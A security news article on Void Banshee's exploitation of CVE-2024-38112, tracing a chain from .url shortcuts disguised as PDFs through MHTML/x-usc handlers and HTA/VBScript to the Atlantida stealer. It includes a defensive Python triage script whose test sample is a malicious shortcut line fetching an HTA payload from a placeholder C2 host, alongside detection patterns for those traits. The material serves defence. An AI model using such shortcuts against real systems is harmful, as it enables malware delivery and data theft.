Attackers favor legitimate Remote Monitoring and Management (RMM) tools because they provide robust, reliable access to systems and networks, which makes them an effective way to distribute malware widely across an organization’s infrastructure.
Cybersecurity analysts at Check Point recently discovered that hackers have been abusing a zero-day flaw in Internet Explorer to target Windows users. Separately, Trend Micro identified CVE-2024-38112, an MHTML remote code execution vulnerability, being exploited by the APT group Void Banshee.
**Internet Explorer Zero-Day Vulnerability**
The attack chain abuses internet shortcut (.url) files and Microsoft protocol handlers such as MHTML to reach the disabled Internet Explorer engine and run malicious code. The vulnerability has been used to deploy the Atlantida stealer, which has been active since January 2024 and targets regions including North America, Europe, and Southeast Asia for information theft and financial gain.
**CVE-2024-38112 Zero-Day Campaign (Source: Trend Micro)**
Despite the official end of support and the disabling of Internet Explorer, remnants of it linger in modern Windows systems. Void Banshee exploited CVE-2024-38112, much as CVE-2021-40444 was exploited, by using specially crafted URL files that combine the MHTML protocol handler with x-usc directives to execute HTA files through the disabled IE process. The technique sidesteps IE’s retirement and reuses its historically large attack surface. Microsoft addressed the vulnerability in July 2024 by unregistering the MHTML handler from IE.
Void Banshee exploited CVE-2024-38112 by sending malicious URL files disguised as PDFs to executives and students. The chain involves using the MHTML protocol handler and x-usc directives to reach the disabled Internet Explorer, downloading an HTA file, and running VBScript. It ends by invoking LoadToBadXml, a .NET Trojan loader, which injects the Atlantida stealer into RegAsm.exe.
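A defender-side illustration of the shortcut-file traits described above, added here as an example and not taken from the article or from Trend Micro’s report: it parses the INI-style body of a .url file and flags a URL= target that uses the mhtml: handler, an x-usc directive, or an .hta payload. The sample .url bodies are constructed with placeholder hosts and are not real indicators.

```python
# Added example (not from the article or Trend Micro): triage Internet
# Shortcut (.url) files for the CVE-2024-38112 pattern the article
# describes. Sample bodies are constructed with placeholder hosts.
import re
from typing import List, Optional


def parse_url_file(text: str) -> Optional[str]:
    """Return the URL= value from the [InternetShortcut] section, if any."""
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section == "internetshortcut" and "=" in line:
            key, _, value = line.partition("=")
            if key.strip().lower() == "url":
                return value.strip()
    return None


def triage_url_file(text: str) -> List[str]:
    """Return the shortcut traits the chain relies on; [] means nothing found."""
    target = (parse_url_file(text) or "").lower()
    indicators = []
    if target.startswith("mhtml:"):              # MHTML handler routes into IE
        indicators.append("mhtml-handler")
    if "!x-usc:" in target:                      # x-usc nests a second URL
        indicators.append("x-usc-directive")
    if re.search(r"\.hta(?:[?#]|$)", target):    # HTA payload as final target
        indicators.append("hta-target")
    return indicators


# Constructed samples: a benign shortcut and one mimicking the chain.
BENIGN_URL_FILE = "[InternetShortcut]\r\nURL=https://www.example.com/report.pdf\r\n"
SUSPICIOUS_URL_FILE = (
    "[InternetShortcut]\r\n"
    "URL=mhtml:http://c2.invalid/index.html!x-usc:http://c2.invalid/doc.hta\r\n"
)

if __name__ == "__main__":
    for name, body in (("benign", BENIGN_URL_FILE), ("suspicious", SUSPICIOUS_URL_FILE)):
        print(f"{name}: {triage_url_file(body) or 'clean'}")
```

Run it over .url attachments pulled from mail quarantine or endpoint telemetry; any non-empty result is worth a closer look, since legitimate shortcuts almost never need the mhtml: handler.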
**Atlantida Stealer (Source: Trend Micro)**
The Atlantida stealer gathers extensive confidential data from various applications, browsers, and system locations. It compresses the data into a ZIP file and transmits it through TCP port 6655 to the attacker’s command and control (C&C) server.
Even though Internet Explorer is disabled, attackers exploit its residual presence to install ransomware and other malicious software. Void Banshee is an example of an APT group abusing unsupported, unpatched components, which underscores a significant security problem. Prompt response combined with advanced security tooling is recommended for containing breaches and protecting systems.